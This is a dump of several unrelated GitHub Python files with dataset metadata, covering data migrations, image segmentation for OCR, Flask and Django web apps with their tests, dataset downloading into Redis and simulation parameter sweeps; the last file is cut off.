Retorna quantas migracoes devem ser rodadas por task (default = 1000)\nMIGRATIONS_PER_TASK = 2\n\n# Descricao amigavel dessa alteracao no banco\nDESCRIPTION = 'multiplica por 2'\n\n\ndef update_json_data(migrate_result, old_json_data):\n old_json_data = json.loads(old_json_data) if old_json_data else {}\n migrate_result = json.loads(migrate_result) if migrate_result else {}\n if 'v1_for_namespace' not in old_json_data:\n old_json_data['v1_for_namespace'] = {}\n for ns in migrate_result['v1_for_namespace']:\n if ns in old_json_data['v1_for_namespace']:\n old_json_data['v1_for_namespace'][ns].extend(migrate_result['v1_for_namespace'][ns])\n else:\n old_json_data['v1_for_namespace'][ns] = migrate_result['v1_for_namespace'][ns]\n return json.dumps(old_json_data)\n\n\ndef get_query():\n \"\"\" Retorna um objeto query das coisas que precisam ser migradas \"\"\"\n return QueDoidura.query()\n\n\ndef migrate_many(entities):\n for entity in entities:\n entity.v2 = entity.v1 * 2\n ndb.put_multi(entities)\n ns = namespace_manager.get_namespace()\n return json.dumps({'v1_for_namespace': {ns: [e.v1 for e in entities]}})","repo_name":"qmagico/gae-migrations","sub_path":"tests/my/migrations/migration_0001_one.py","file_name":"migration_0001_one.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73976354408","text":"from .Circle import Circle\nfrom .Line import Line\nfrom .Point import Point\n\nclass Animator:\n @staticmethod\n def construct(line, frame_count):\n \"\"\"\n int -> list\n :returns: returns a list that is the animation of a line being drawn\n from self.a to self.b\n \"\"\"\n res = []\n # offset_x/y computes the x/y of of b at the ith frame wrt a\n offset_x = lambda i: int((i * line.dx)/(frame_count-1))\n offset_y = lambda i: int((i * line.dy)/(frame_count-1))\n # b(i) compuths the location of b at the ith frame\n b = lambda i: (line.a.x + offset_x(i), line.a.y + offset_y(i))\n a = line.a\n for i in range(frame_count):\n b_i = Point(*b(i))\n next_line = Line(a, b_i)\n res.append(next_line.node)\n return res\n","repo_name":"JDong3/euclidean","sub_path":"objects/geometry/Animator.py","file_name":"Animator.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7214035207","text":"import functools\nimport json\nimport os\nimport pathlib\nimport shutil\nimport tarfile\nfrom pathlib import Path\n\nimport click\nimport pandas as pd\nimport redis\nimport requests\nfrom redis.commands.json.path import Path as redPath\nfrom tqdm import tqdm\nfrom collections import OrderedDict\n\n\ndata_dir = Path('semantic_search/data/abo/')\n\nurl = 'https://amazon-berkeley-objects.s3.amazonaws.com/archives/'\nfilename = 'abo-images-small.tar'\ntar_filename = os.path.join('abo', filename)\npath = pathlib.Path('abo') / filename\nlistings = 'https://amazon-berkeley-objects.s3.amazonaws.com/archives/abo-listings.tar'\npath_list = pathlib.Path('abo') / 'abo-listings.tar'\nlistings_dir = data_dir/ 'listings'/'metadata'\ncsv = data_dir / 'images' /'metadata'/'images.csv.gz'\n\n\nr = redis.Redis(host=\"localhost\", port=6379)\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"])\n\nclass OrderedGroup(click.Group):\n def __init__(self, name=None, commands=None, **attrs):\n super(OrderedGroup, self).__init__(name, commands, **attrs)\n #: the registered subcommands by their exported names.\n self.commands = commands or OrderedDict()\n\n def list_commands(self, ctx):\n return self.commands\n\n\n@click.group(cls=OrderedGroup, context_settings=CONTEXT_SETTINGS)\ndef cli():\n pass\n\n@cli.command()\ndef download():\n \"\"\"Downloads the Amazon-Berkley Objects dataset to 'abo' directory and continues\"\"\"\n response = requests.get(url+filename, stream=True)\n if response.status_code != 200:\n response.raise_for_status() # Will only raise for 4xx codes, so...\n raise RuntimeError(f\"Request to {url} returned status code {r.status_code}\")\n file_size = int(response.headers.get('Content-Length', 0))\n\n path.parent.mkdir(parents=True, exist_ok=True)\n\n desc = \"(Unknown total file size)\" if file_size == 0 else \"\"\n response.raw.read = functools.partial(response.raw.read)\n\n click.echo('-'*10 + \" Downloading Image Data \" + '-'*10)\n with tqdm.wrapattr(response.raw, \"read\", total=file_size, desc=desc) as r_raw:\n with path.open(\"wb\") as f:\n shutil.copyfileobj(r_raw, f)\n\n\n response2 = requests.get(listings, stream=True)\n if response2.status_code != 200:\n response2.raise_for_status()\n raise RuntimeError(f\"Request to {listings} returned status code {r.status_code}\")\n file_size = int(response2.headers.get('Content-Length', 0))\n response2.raw.read = functools.partial(response2.raw.read)\n\n click.echo('-'*10 + \" Downloading Listing Data \" + '-'*10)\n with tqdm.wrapattr(response2.raw, \"read\", total=file_size, desc=desc) as r_list:\n with path_list.open(\"wb\") as f:\n shutil.copyfileobj(r_list, f)\n _extract()\n\n\n@cli.command(name='extract')\ndef extract():\n \"Untars the ABO dataset from 'abo' directory and continues\"\n _extract()\n\ndef _extract():\n click.echo('-'*10 + \" Extracting Data \" + '-'*10)\n with tarfile.open(name=path) as tar:\n # Go over each member\n for member in tqdm(iterable=tar.getmembers(), total=len(tar.getmembers())):\n # Extract member\n tar.extract(member=member, path='abo')\n with tarfile.open(name=path_list) as tar:\n tar.extractall(path='abo')\n\n click.echo('-'*10 + \" Data available at abo/ \" + '-'*10)\n _add()\n\n\n@cli.command()\ndef add():\n \"\"\"Adds the untared metadata to redis db. Ensure redis is running.\n The image metadata is with `IMG:image_id` key.\n The photo (flat file) name to image_id mapping is with `MAP:name` key\n \"\"\"\n _add()\n\ndef _add():\n listing_jsons = [f for f in listings_dir.iterdir()]\n def extract_values(x):\n if isinstance(x, list) and 'value' in x[0]:\n return [a['value'] for a in x]\n if pd.isna(x):\n return ''\n else:\n return x\n\n\n descriptors = ['item_id', 'item_name', 'model_name', 'brand', 'bullet_point']\n for listing_file in listing_jsons:\n df_list = pd.read_json(listing_file, lines=True)\n pipe = r.pipeline()\n for _, row in df_list.iterrows():\n feature = json.dumps({d: extract_values(row[d]) for d in descriptors})\n if not pd.isna(row['main_image_id']):\n key = \"IMG:\" + row['main_image_id']\n pipe.json().set(key, redPath.root_path(), feature)\n\n try:\n for img in row['other_image_id']:\n key = \"IMG:\" + img\n pipe.json().set(key, redPath.root_path(), feature)\n\n except TypeError:\n # ignore nans\n pass\n print(\"Starting to update redis\")\n pipe.execute()\n\n df = pd.read_csv(csv)\n df['name'] = df['path'].str.extract(r'\\/(.*).jpg')\n pipe = r.pipeline()\n for _, (name, id) in df[['name', 'image_id']].iterrows():\n pipe.set('MAP:'+ str(name), id )\n pipe.execute()\n\n\nif __name__ == \"__main__\":\n cli()","repo_name":"u6yuvi/fsdl_project","sub_path":"semantic_search/data/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"9886383427","text":"import warnings\nfrom typing import TYPE_CHECKING, Optional, Sequence\n\nimport pendulum\nfrom dagster._core.scheduler.instigation import (\n InstigatorType,\n TickStatus,\n)\n\nif TYPE_CHECKING:\n from ..schema.util import ResolveInfo\n from .loader import RepositoryScopedBatchLoader\n\n\ndef get_instigation_ticks(\n graphene_info: \"ResolveInfo\",\n instigator_type: InstigatorType,\n instigator_origin_id: str,\n selector_id: str,\n batch_loader: Optional[\"RepositoryScopedBatchLoader\"],\n dayRange: Optional[int],\n dayOffset: Optional[int],\n limit: Optional[int],\n cursor: Optional[str],\n status_strings: Optional[Sequence[str]],\n before: Optional[float],\n after: Optional[float],\n):\n from ..schema.instigation import GrapheneInstigationTick\n\n if before is None:\n if dayOffset:\n before = pendulum.now(\"UTC\").subtract(days=dayOffset).timestamp()\n elif cursor:\n parts = cursor.split(\":\")\n if parts:\n try:\n before = float(parts[-1])\n except (ValueError, IndexError):\n warnings.warn(f\"Invalid cursor for ticks: {cursor}\")\n\n if after is None:\n after = (\n pendulum.now(\"UTC\").subtract(days=dayRange + (dayOffset or 0)).timestamp()\n if dayRange\n else None\n )\n\n statuses = [TickStatus(status) for status in status_strings] if status_strings else None\n\n if batch_loader and limit and not cursor and not before and not after:\n if instigator_type == InstigatorType.SENSOR:\n ticks = batch_loader.get_sensor_ticks(\n instigator_origin_id,\n selector_id,\n limit,\n )\n elif instigator_type == InstigatorType.SCHEDULE:\n ticks = batch_loader.get_schedule_ticks(\n instigator_origin_id,\n selector_id,\n limit,\n )\n else:\n raise Exception(f\"Unexpected instigator type {instigator_type}\")\n\n return [GrapheneInstigationTick(graphene_info, tick) for tick in ticks]\n\n return [\n GrapheneInstigationTick(graphene_info, tick)\n for tick in graphene_info.context.instance.get_ticks(\n instigator_origin_id,\n selector_id,\n before=before,\n after=after,\n limit=limit,\n statuses=statuses,\n )\n ]\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-graphql/dagster_graphql/implementation/fetch_ticks.py","file_name":"fetch_ticks.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"23328396858","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nimport os, sys\npath = \"/home/hashrin/project/final/working/\"\ndirs = sorted(os.listdir( path ))\ndef seg():\n count=1\n for item in dirs:\n if os.path.isfile(path+item):\n image = cv2.imread(path+item)\n f, e = os.path.splitext(path+item)\n #cv2.imshow('orig',image)\n #cv2.waitKey(0)\n im=image.shape\n # print(im[1])\n #grayscale\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('gray',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('gray',(im[1]//2,im[0]//2))\n # cv2.imshow('gray',gray)\n # cv2.waitKey(0)\n\n #binary_inverse\n ret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('otsu',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('otsu',(im[1]//2,im[0]//2))\n cv2.imshow('otsu',thresh)\n cv2.waitKey(0)\n thresh=255-thresh\n\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('binary inverse',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('binary inverse',(im[1]//2,im[0]//2))\n # cv2.imshow('binary inverse',thresh)\n # cv2.waitKey(0)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('second',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('second',(im[1]//2,im[0]//2))\n # cv2.imshow('second',thresh)\n # cv2.waitKey(0)\n\n # #dilation\n # kernel = np.ones((5,im[1]*3//10), np.uint8)\n # img_dilation = cv2.dilate(thresh, kernel, iterations=1)\n # cv2.imshow('dilated',img_dilation)\n # cv2.waitKey(0)\n\n # #erosion\n # kernel = np.ones((5,im[1]*3//10), np.uint8)\n # img_erosion= cv2.erode(img_dilation, kernel, iterations=1)\n\n # cv2.imshow('eroded',img_erosion)\n # cv2.waitKey(0)\n\n #closing\n kernel = np.ones((3,im[1]//8), np.uint8)\n closing=cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('closed',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('closed',(im[1]//2,im[0]//2))\n cv2.imshow('closed',closing)\n cv2.waitKey(0)\n\n #find contours\n im2,ctrs, hier = cv2.findContours(closing.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n #sort contours\n sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.boundingRect(ctr)[1])\n #sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.minAreaRect(ctr)[1])\n\n\n for i, ctr in enumerate(sorted_ctrs):\n # Get bounding box\n x, y, w, h = cv2.boundingRect(ctr)\n # Getting ROI\n roi = image[y:y+h, x:x+w]\n roi_thresh=thresh[y:y+h,x:x+w]\n mask=np.zeros_like(gray)\n cv2.drawContours(mask,[ctr],0, (255,255,255), -1)\n cv2.imshow('final',mask)\n cv2.waitKey(0)\n roi_mask=mask[y:y+h,x:x+w]\n roi_thresh=cv2.bitwise_and(roi_thresh,roi_mask)\n #roi_thresh=255-roi_thresh\n\n\n # show ROI\n if(roi.shape[1]>im[1]//15):\n # if(image.shape[1]>1000):\n # cv2.namedWindow('segment no:'+str(i),cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('segment no:'+str(i),(x//2,y//2))\n cv2.imshow('segment no:'+str(i),roi_thresh)\n cv2.imwrite(\"/home/hashrin/project/final/working/line/\"+\"00\"+str(count)+\".jpg\",roi_thresh)\n count=count+1\n # cv2.rectangle(image,(x,y),( x + w, y + h ),(90,0,255),2)\n # cv2.waitKey(0)\n # cv2.imshow('segment no:'+str(i),roi)\n # cv2.imwrite(\"line/\"+str(i)+\".png\",roi)\n # cv2.waitKey(0)\n #cv2.imshow('marked areas',image)\n #cv2.waitKey(0)\nseg()","repo_name":"Hashrin/Handwritten-Malayalam-OCR","sub_path":"Segmentation/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23237762690","text":"from flask import Flask, render_template, request\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nimport numpy as np\nimport pickle\n\napp = Flask(__name__)\n\ndef load_model():\n model = keras.models.load_model('app/model.h5')\n return (model)\n\n@app.route('/')\ndef Home():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n maxlen = 100\n text = request.form['Headline']\n tk = Tokenizer()\n with open('app/tokenizer.pickle', 'rb') as handle:\n tk = pickle.load(handle)\n X = tk.texts_to_sequences([text])\n X = pad_sequences(X,maxlen=maxlen,padding='post',value=0)\n model = load_model()\n pred = model.predict(X)\n pred_perc = np.round(float(100 * pred), decimals=2)\n data = \"Prediction:\"\n percent_text = \"{}% sarcasm detected!\".format(pred_perc)\n if np.round(pred) == 1:\n headline_text_results = \"Therefore, the headline is Sarcastic!\"\n else:\n headline_text_results = \"Therefore, the headline is not Sarcastic!\"\n return render_template('index.html',\n headline_text = text,\n prediction_text= data,\n percent_text=percent_text,\n headline_text_results=headline_text_results)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"adamhkb/sarcasm-detector-flask","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39133204027","text":"from django.conf.urls.defaults import *\nfrom django.utils.translation import ugettext as _\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^hit/$',\n \t 'hitcount.views.update_hit_count_ajax',\n \t name='hitcount_update_ajax'),\n\n url(r'^stream-updated/$',\n \t 'ajax.views.stream_updated', \n \t name='ajax-stream-updated'),\n\n)\n","repo_name":"mfitzp/django-golifescience","sub_path":"apps/ajax/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74894726247","text":"import gnlogger\nimport logging\n\n# a logger for this module\nmodule_logger = logging.getLogger(__name__)\n\nclass Auxiliary:\n def __init__(self):\n #self.logger = logging.getLogger('spam_application.auxiliary.Auxiliary')\n # a logger for this class\n self.logger = logging.getLogger(str(self.__class__))\n self.logger.info('creating an instance of Auxiliary')\n def do_something(self):\n self.logger.info('doing something')\n a = 1 + 1\n self.logger.info('done doing something')\n\ndef some_function():\n # function uses module logger\n module_logger.info('received a call to \"some_function\"')\n\n\nif __name__ == '__main__':\n\n gnlogger.logconf() # initializes the logging facility\n\n module_logger.info('start this module')\n\n obja = Auxiliary()\n obja.do_something()\n some_function()\n\n module_logger.info('finish this module')\n\n\n\n\n\n","repo_name":"git-artes/GNUWiNetwork","sub_path":"gwn/utils/logger/gnlogger_test.py","file_name":"gnlogger_test.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2478158444","text":"import itertools\nimport numpy as np\nfrom ....Classes.ParamExplorerSet import ParamExplorerSet\n\n\ndef get_simulations(self):\n \"\"\"Create simulations and returns them\n\n Returns\n -------\n multisim_dict : dict\n dictionary containing simulation shape, setters, parameter values and simulations generated\n \"\"\"\n # Get reference simulation\n ref_simu = self.parent\n\n # Build the list\n setter_list = [] # Store ParamExplorer setters\n params_value_dict = {} # Store parameter value list per ParamExplorer\n params_symbol_list = [] # Store ParamExplorer symbols\n params_value_list = [] # Store ParamExplorer values to perform cartesian product\n multisim_shape = []\n\n n_param = 0\n # Add values and shape in the list\n for param_explorer in self.paramexplorer_list:\n n_param += 1\n params_value_dict[param_explorer.symbol] = []\n params_symbol_list.append(param_explorer.symbol)\n setter_list.append(param_explorer.setter)\n\n # Generate values\n values = param_explorer.get_value()\n params_value_list.append(values)\n multisim_shape.append(len(values))\n\n if len(params_value_list) > 0:\n self.nb_simu = 1\n for values in params_value_list:\n self.nb_simu *= len(values)\n\n multisim_dict = {\n \"nb_simu\": self.nb_simu, # Shape simulation\n \"paramexplorer_list\": [], # Setter's values\n \"simulation_list\": [],\n }\n\n # Cartesian product to generate every simulation\n for simu_param_values in itertools.product(*params_value_list):\n # Generate the simulation\n new_simu = ref_simu.copy()\n\n # Remove its multisimulation to avoid infinite simulations\n new_simu.var_simu = None\n\n # Store simulation input_values and setters\n input_values = []\n\n # Edit it using setter\n for setter, value, symbol in zip(\n setter_list, simu_param_values, params_symbol_list\n ):\n setter(new_simu, value)\n params_value_dict[symbol].append(value)\n\n # Add the simulation\n multisim_dict[\"simulation_list\"].append(new_simu)\n\n # Create slices to extract ndarrays from multisim_values\n slices = ()\n for _ in multisim_shape:\n slices += (slice(None),)\n\n # Create ParamExplorerValue to be stored in XOutput\n for param_explorer in self.paramexplorer_list:\n multisim_dict[\"paramexplorer_list\"].append(\n ParamExplorerSet(\n name=param_explorer.name,\n symbol=param_explorer.symbol,\n unit=param_explorer.unit,\n setter=param_explorer.setter,\n value=params_value_dict[param_explorer.symbol],\n )\n )\n\n return multisim_dict\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Simulation/VarParam/get_simulations.py","file_name":"get_simulations.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18159798538","text":"import json\n\nfrom main.tests.factories.org_member_factory import ManagerFactory, OrgMemberFactory, DTFactory\nfrom main.tests.factories.organisation_factory import OrganisationFactory\nfrom main.tests.factories.user_factory import UserFactory\nfrom main.tests.factories.entry_factory import EntryFactory\nfrom main.tests.factories.competition_factory import BaseCompetitionFactory\nfrom main.settings import MAX_AUTOCOMPLETE_RESPONSES\nfrom django.test import TestCase, Client\nfrom django.urls import reverse\nfrom main.models import OrganisationMembership\n\n\nclass TestOrganisationAPI(TestCase):\n\n def setUp(self):\n self.c = Client()\n self.organisation = OrganisationFactory() # type: Organisation\n self.manager = ManagerFactory(organisation=self.organisation).user\n self.target = reverse('main/organisation_endpoint', kwargs={'org_id': self.organisation.id})\n\n def test_accept_application_base(self):\n self.c.force_login(self.manager)\n applicant = OrgMemberFactory(organisation=self.organisation)\n out = self.c.post(self.target, {'type': 'accept_application',\n 'user_id': applicant.user.id})\n self.assertJSONEqual(out.content, {'success': True})\n applicant.refresh_from_db()\n self.assertEqual(applicant.state, OrganisationMembership.DT)\n\n def test_accept_application_unauthorised(self):\n applicant = OrgMemberFactory(organisation=self.organisation)\n for user in [applicant.user, DTFactory(organisation=self.organisation).user]:\n self.c.force_login(user)\n out = self.c.post(self.target, {'type': 'accept_application',\n 'user_id': applicant.user.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n applicant.refresh_from_db()\n self.assertEqual(applicant.state, OrganisationMembership.APPLICANT)\n\n def test_accept_application_already_full_member(self):\n applicant = ManagerFactory(organisation=self.organisation)\n self.c.force_login(self.manager)\n out = self.c.post(self.target, {'type': 'accept_application',\n 'user_id': applicant.user.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': \"already_full_member\",\n 'verbose_reason': \"User is already a full member\"})\n applicant.refresh_from_db()\n self.assertEqual(applicant.state, OrganisationMembership.MANAGER)\n\n def test_join_organisation_base(self):\n applicant = UserFactory()\n self.c.force_login(applicant)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': True})\n application = applicant.organisationmembership_set.get(organisation=self.organisation)\n self.assertEqual(application.state, OrganisationMembership.APPLICANT)\n\n def test_join_organisation_manager(self):\n applicant = UserFactory()\n self.c.force_login(self.manager)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': True})\n application = applicant.organisationmembership_set.get(organisation=self.organisation)\n self.assertEqual(application.state, OrganisationMembership.DT)\n\n def test_join_organisation_unauthorised(self):\n applicant = UserFactory()\n user = DTFactory(organisation=self.organisation).user\n self.c.force_login(user)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n self.assertEqual(applicant.organisationmembership_set.count(), 0)\n\n def test_join_organisation_already_applied(self):\n applicant = UserFactory()\n user = DTFactory(organisation=self.organisation).user\n self.c.force_login(user)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n self.assertEqual(applicant.organisationmembership_set.count(), 0)\n\n def test_competitor_autocomplete(self):\n user = DTFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(8):\n EntryFactory(organisation=self.organisation, competition=competition)\n expected = self.organisation.competitor_set.first()\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': expected.name[0:5]})\n result = json.loads(out.content)\n expected_values = {'name': expected.name, 'license_number': expected.license_number,\n 'club_name': expected.entry_set.latest().club.name}\n self.assertIn(expected_values, result['competitors'])\n\n def test_competitor_autocomplete_short_string(self):\n user = DTFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(8):\n EntryFactory(organisation=self.organisation, competition=competition)\n expected = self.organisation.competitor_set.first()\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': expected.name[0:2]})\n result = json.loads(out.content)\n self.assertEqual(len(result['competitors']), 0)\n\n def test_competitor_limit_response_length(self):\n user = DTFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(MAX_AUTOCOMPLETE_RESPONSES + 1):\n EntryFactory(organisation=self.organisation, competition=competition)\n self.organisation.competitor_set.update(name=\"Roger Rabbit\")\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': 'roger'})\n result = json.loads(out.content)\n self.assertEqual(len(result['competitors']), MAX_AUTOCOMPLETE_RESPONSES)\n\n def test_competitor_autocomplete_unauthorised(self):\n user = OrgMemberFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(8):\n EntryFactory(organisation=self.organisation, competition=competition)\n expected = self.organisation.competitor_set.first()\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': expected.name[:5]})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n\n def test_post_bad_type(self):\n self.c.force_login(self.manager)\n out = self.c.post(self.target, {'type': 'anything_else'})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'unrecognised request',\n 'verbose_reason': 'Unrecognised request'})\n","repo_name":"saty9/allez","sub_path":"main/tests/views/test_organisation_api.py","file_name":"test_organisation_api.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2263318968","text":"import os, secrets, cloudinary.uploader, cloudinary.api, cloudinary\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash\nfrom flask_login import login_required, login_user, logout_user, current_user\nfrom application import db, bcrypt, allowed_file, app\nfrom application.model.eatery import User\nfrom application.model.menus import Menus\nfrom werkzeug.utils import secure_filename\nfrom PIL import Image\n\neat = Blueprint('eat',__name__)\n\n@eat.route('/eat')\ndef eatery():\n return 'hi'\n\n@eat.route('/lifeat')\n@login_required\ndef lifeat():\n all_menu = Menus.query.all()\n all_user = User.query.all()\n all_menu.reverse()\n return render_template('chatting.html', all_menu=all_menu, all_user=all_user)\n\n@eat.route('/register', methods=['GET'])\ndef register_get():\n auth = '/'\n button = 'how_to_reg'\n return render_template('register.html', auth=auth)\n\n@eat.route('/register', methods=['POST'])\ndef register_post():\n email = request.form.get('email')\n password = request.form.get('password')\n username = request.form.get('username')\n profile_px = request.files['profile_px']\n \n check_user = User.query.filter_by(email=email).first()\n if check_user and check_user.username == username:\n return redirect('/')\n \n filename = secrets.token_hex(16)+'.jpg'\n # profile_px__path = '/home/yashuayaweh/Documents/PROGRAMMING/lifeat/application/static/imgs/profile_px'\n upload_img = cloudinary.uploader.upload(\n profile_px,\n folder = \"lifeat/profile_pix/\",\n public_id=filename,\n overwrite = True,\n resource_type = \"image\"\n )\n img = upload_img['url']\n new_user = User(username=username, email=email, profile_px=img, password=password)\n db.session.add(new_user)\n db.session.commit()\n \n # profile_px.save(os.path.join(profile_px__path, filename))\n # picture = Image.open(os.path.join(profile_px__path, filename))\n # picture.save(os.path.join(profile_px__path , filename), quality=20, optimize=True)\n #this was the previous obsolete code.\n flash('Your account have been created')\n return redirect('/')\n\n\n@eat.route('/', methods=['GET'])\ndef login_get():\n auth = '/register'\n return render_template('login.html', current_user=current_user, auth=auth)\n\n@eat.route('/loginpost', methods=['POST'])\ndef login_post():\n email = request.form.get('email')\n password = request.form.get('password')\n \n search_user = User.query.filter_by(email=email).first()\n if search_user and bcrypt.check_password_hash(search_user.password, password):\n login_user(search_user)\n return redirect('/lifeat')\n \n return redirect('/register')\n\n@eat.route('/makemenu', methods=['GET'])\n@login_required\ndef makemenu_get():\n return render_template('makemenu.html')\n\n@eat.route('/makemenu', methods=['POST'])\n@login_required\ndef makemenu_post():\n image = request.files['image']\n title = request.form.get('title')\n description = request.form.get('description')\n price = request.form.get('price')\n if allowed_file(image.filename):\n filename = secrets.token_hex(16)+'.jpg'\n upload_img = cloudinary.uploader.upload(\n image,\n folder = \"lifeat/menu/\",\n public_id=filename,\n overwrite = True,\n resource_type = \"image\"\n )\n img = upload_img['url']\n newMenu = Menus(title=title, description=description, picture=img, price=price, user_id=current_user.id)\n db.session.add(newMenu)\n db.session.commit()\n # image.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # picture = Image.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # picture.save(os.path.join(app.config['UPLOAD_FOLDER'], filename), quality=20, optimize=True)\n # os.rename(os.path.join(app.config['UPLOAD_FOLDER'], filename), os.path.join(app.config['UPLOAD_FOLDER'], new_name+'.jpg'))\n return redirect('/lifeat')\n\n@eat.route('/user/' , methods=['GET'])\ndef user(user_id):\n user = User.query.get(user_id)\n return render_template('user.html', current_user=current_user, user=user)\n\n@eat.route('/view_menu/', methods=['GET'])\ndef view_menu(id):\n menu = Menus.query.get(id)\n return render_template('view_menu.html', current_user=current_user, menu=menu)\n\n@eat.route('/logout', methods=['GET'])\n@login_required\ndef logout():\n logout_user()\n \n return redirect('/')","repo_name":"georgegoldman/lifeat","sub_path":"application/route/eatery.py","file_name":"eatery.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41623805044","text":"'''\n16-Crea dos listas con la misma cantidad de elementos y luego \ncrea una tercera lista que contenga los elementos \nde ambas listas intercalados. Por ejemplo,\nsi las dos listas son [1, 2, 3] y [\"a\", \"b\", \"c\"], \nla tercera lista deberíaser[1,\"a\",2,\n\"b\",3,\"c\"].\n'''\n\nlista_uno = [1, 2, 3]\nlista_dos = [\"a\", \"b\", \"c\"]\n\nlista_tres = []\n\nfor indice in range(len(lista_uno)):\n lista_tres.append(lista_uno[indice])\n lista_tres.append(lista_dos[indice])\n\nprint(lista_tres)","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"4-Ejercicios-Listas-GUIA/16_Ejercicio_tres_list_append.py","file_name":"16_Ejercicio_tres_list_append.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35610310047","text":"from flask import Flask, request, render_template, redirect, session\nfrom flask_sqlalchemy import SQLAlchemy\n\nTEMPLATE_FOLDER_PATH = '/home/pi/Desktop/ComNet-class-project/HTMLtemplate'\nSTATIC_FOLDER_PATH = '/home/pi/Desktop/ComNet-class-project/static'\n\napp = Flask(__name__, template_folder = TEMPLATE_FOLDER_PATH)\napp._static_folder = STATIC_FOLDER_PATH\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////home/pi/Desktop/ComNet-class-project/database.db'\napp.config['SECRET_KEY'] = 'thisissecret'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n\ndb = SQLAlchemy(app)\n\n#declare necessary parameters\nARGO_PER_HOUR 